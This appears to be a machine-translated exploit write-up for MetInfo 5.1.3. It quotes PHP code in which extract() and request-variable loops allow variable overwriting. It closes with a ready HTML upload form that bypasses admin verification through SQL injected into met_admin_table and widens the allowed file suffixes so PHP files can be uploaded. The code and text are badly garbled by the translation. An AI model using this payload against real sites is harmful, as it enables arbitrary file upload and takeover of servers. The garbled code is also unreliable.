MetInfo_v5.1.3 Arbitrary File Upload

MetInfo released the new version 5.1.5 on the 23rd and fixed the vulnerability mentioned in this Article. Of course, it should strictly be an arbitrary variable overwrite vulnerability .... ps: You are welcome to repost it in various forms. The first t00ls.net is not much nonsense. Check the code: 01 include \ common. inc. php 20-3902 03 $ db_settings = parse_ini_file (ROOTPATH. 'config/config_db.php '); 04 @ extract ($ db_settings); 05 require_once ROOTPATH. 'include/mysql_class.php '; 06 $ db = new dbmysql (); 07 $ db-> dbconn ($ con_db_host, $ con_db_id, $ con_db_pass, $ con_db_name ); 08 define ('Magic _ QUOTES_GPC ', get_magic_quot Es_gpc (); 09 isset ($ _ REQUEST ['globals']) & exit ('Access error'); 10 require_once ROOTPATH. 'include/global. func. php '; 11 foreach (array (' _ cookies', '_ Post',' _ get') as $ _ request) {12 foreach ($ _ request as $ _ key = >$ _ value) {13 $ _ key {0 }! = '_' & $ _ Key = daddslashes ($ _ value ); 14} 15} 16 $ query = "select * from {$ tablepre} config where name = 'Met _ tablename' and lang = 'metinfo '"; 17 $ mettable = $ db-> get_one ($ query); 18 $ mettables = explode ('|', $ mettable [value]); 19 foreach ($ mettables as $ key => $ val) {20 $ tablename = 'Met _'. $ val; 21 $ tablename = $ tablepre. $ val; 22} The metinfo system queries the {$ tablepre} config table of the database and initializes the table name variable through the foreach loop, the Code 1 $ db_settings = p Arse_ini_file (ROOTPATH. 'config/config_db.php '); 2 @ extract ($ db_settings); to initialize, then, you can use the SQL query database such as "SELECT * FROM $ met_message where id = $ id and lang = '$ lang'" in the system to query the database, the $ met_message variable is the variable initialized by the foreach loop ...... We can overwrite the $ tablepre variable to make the table name initialization fail, and then submit the table name variable ..... I found an upload page in the background, and used the overwriting variable to bypass background verification and overwrite the list of allowed upload suffixes to construct an upload vulnerability. Exp: 1 Arbitrary File Upload 2 <form enctype = "multipart/form-data" method = "POST" name = "myform" action = "http: // www.2cto.com/metinfo/admin/include/uploadify. php? Tablepre = xx & met_lang = met_lang & lang = cn & met_admin_table = met_admin_table % 20 where % 20 usertype = 3% 23 & metinfo_admin_id = 1 & metinfo_admin_pass = 2 & type = upfile & met_file_format = jpg | pphphp "> 3 <input name =" Filedata "type = 'file' size =" 20 "> 4 <input type =" submit "name =" Submit "value =" submit information "> 5 </form>